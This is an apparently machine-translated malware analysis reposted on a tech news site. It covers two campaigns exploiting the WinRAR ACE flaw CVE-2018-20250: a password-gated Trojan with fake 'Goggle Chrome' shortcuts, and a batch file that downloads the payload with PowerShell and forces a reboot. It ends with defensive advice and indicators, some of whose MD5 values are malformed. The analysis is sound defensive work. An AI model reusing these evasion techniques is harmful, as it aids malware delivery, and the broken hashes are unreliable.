Your location:Tech News>OS>Windows 8>WinRAR (CVE 2018 20250) exploits and upgrades to reduce restarts

Latest News

WinRAR (CVE 2018 20250) exploits and upgrades to reduce restarts

Author:fsadmin

Views:

Since WinRAR was exposed to unacev2.dll arbitrary code execution vulnerability (CVE-2018-20250) because the vulnerability is very simple and easy The characteristics of use are favored by the virus and black products and various malicious uses are coming.

1. Overview

Since WinRAR Since the unacev2.dll arbitrary code execution vulnerability (CVE-2018-20250) was exposed because the vulnerability is very simple and easy to use it has been favored by viruses and black products and various malicious exploits have been coming. But WinRAR unacev2.dll arbitrary code execution vulnerability exploitation has an obvious shortcoming that is the malicious code can be executed after the victim restarts the system.

Recently Tencent Security Yujian Threat Intelligence Center has monitored that attackers have performed technical upgrades to WinRAR exploits which has reduced the number of victims to a certain extent. Actively restart the system's dependencies while ensuring that the malicious Trojan can be started in the first time.

Common use methods:

The use of the attack method after the upgrade:

(1) Attack use method 1

(2) Attack and use method 2

< /p>

Second analysis

Attack utilization method 1:

< p>WinRAR exploit combined with malicious lnk to avoid anti-virus software detection and killing while increasing the probability of malicious Trojan horse execution. The sample information and specific analysis are as follows.

MD5

File name

3e86873fab89792c3f2302b4deb2377f_

mirotvorec.rar

Open mirotvorec.rar the contents of the compressed package are as follows< /p>

Unzip mirotvorec.rar and found that the compressed package also released two lnk files and one exe file

?File 1: %userprofile%\\win.exe (user profile directory)

?File 2: c:\\AppData\\Roaming\\Microsoft\\Windows\\StartMenu\\Programs\\Startup\\Goggle Chrome.lnk (Start menu startup directory)

? File 3: c:\\desktop\\GoggleChrome.lnk (desktop shortcut)

File 1 is the final malicious Trojan horse to be executed which was released under %userprofile% (user directory); the contents of file 2 and file 3 are exactly the same and they both pretend to be the shortcut launch method of Chrome browser (the attacker spells Wrong Google is written as Goggle) but the startup file that the lnk actually points to is %userprofile%\\win.exe which is file 1.

It should be noted that if you execute win.exe directly in the user directory you also need to enter the correct password to continue execution. The password is the execution parameter of the above shortcut win.exe. If you double-click goggle chrome.lnk the password parameter will be executed automatically and the following dialog box for submitting the password will not appear.

This attack has the following differences from previous attacks using WinRAR vulnerabilities:

1) In order to avoid anti-software checking and killing the malicious Trojan that was finally executed was not released to the system self-starting directory but to the user At the same time in order to ensure that the malicious Trojan can be executed smoothly after restarting the malicious lnk masquerading as the shortcut launch method of the Chrome browser is released to the system self-starting directory. The lnk is actually a shortcut launch method of the malicious Trojan;

2) In order to increase the probability of malicious Trojans being executed and at the same time to make up for the shortcomings of WinRAR exploits that need to be restarted the attacker also released the malicious lnk to the desktop to induce the victim to manually click to run;

3 ) In order to avoid anti-virus software checking and killing the malicious Trojan horse needs to enter the correct password to execute (this prevents the automatic analysis tool of the anti-virus manufacturer from discovering anomalies);

4) The user restarts the system or double-clicks to run the malicious lnk Can execute malicious Trojans.

Attack method 2:

< p align='left' style='text-align:left;'>The malicious bat file downloads and decompresses the ACE file and at the same time forces the system to restart to ensure the execution of the malicious Trojan. The attack samples and specific analysis are as follows.

MD5

File name

1e541b14b531bcac70e77a012b0f0f7f

__Denuncia_Activa_CL.PDF.bat

notepad++ opens the bat file the text content is garbled and it is found that the lower right foot indicates that the file uses UCS-2 Little-endian encoding

Reuse the hexadecimal editor to open the bat file you can see the real file content

Execute bat file First generate a random number to rename the malicious rar file to be downloaded

Set the download directory file name etc. and enable powershell commands from the hard-coded url Download malicious rar file

Use WinRAR to decompress release the malicious Trojan to the system startup item directory execute the 'shutdown -r' command to force restart the system to ensure that the malicious Trojan can be started in the first time.

Three safety recommendations

1 unacev2. dll vulnerabilities are not limited to WinRAR. Many compression and decompression tools including WinRAR are risky. It is recommended that users upgrade all these software to the latest version. It is recommended to use the software management of Tencent Computer Manager to complete the software upgrade.

2. Directly delete the UNACEV2.DLL file in the WinRAR installation directory but it will cause the compressed file in the ACE format to be unusable (however the impact is small and the commercial company with the ACE format patent has closed more than ten Years you can completely abandon the ACE compression format).

3. Don't be credulous open files of unknown origin or purpose.

IV. IOCs

IP

195.62.52.164

DOMAIN

lisingrout.ddns.net

.poderjudicial.cl

.triosalud.cl

MD5< /i>

3e86873fab89792c3f2302b4deb2377f

64c3556574daa5bc76a5cede8f8bfcd7

f2c78f8b3582eae0af8912b0293ca8a5

fbc78f8b3582eae0af8912b0293ca8baffb778deb778d80dbcd

0f80d 410b77d8f1cdc76c867b4a6a27ae55e5

URL

hxxps://.triosalud.cl/wp/wp -content/uploads/2019/02/denuncias.rar

hxxps://.triosalud.cl/wp/wp-content/uploads/2019/03/denuncias.rar

hxxps://.triosalud.cl/wp/wp-content/uploads/2019/03/up.php

hxxp://.poderjudicial.cl

?Rust/WinRT for Win 10 public preview released

Recommend article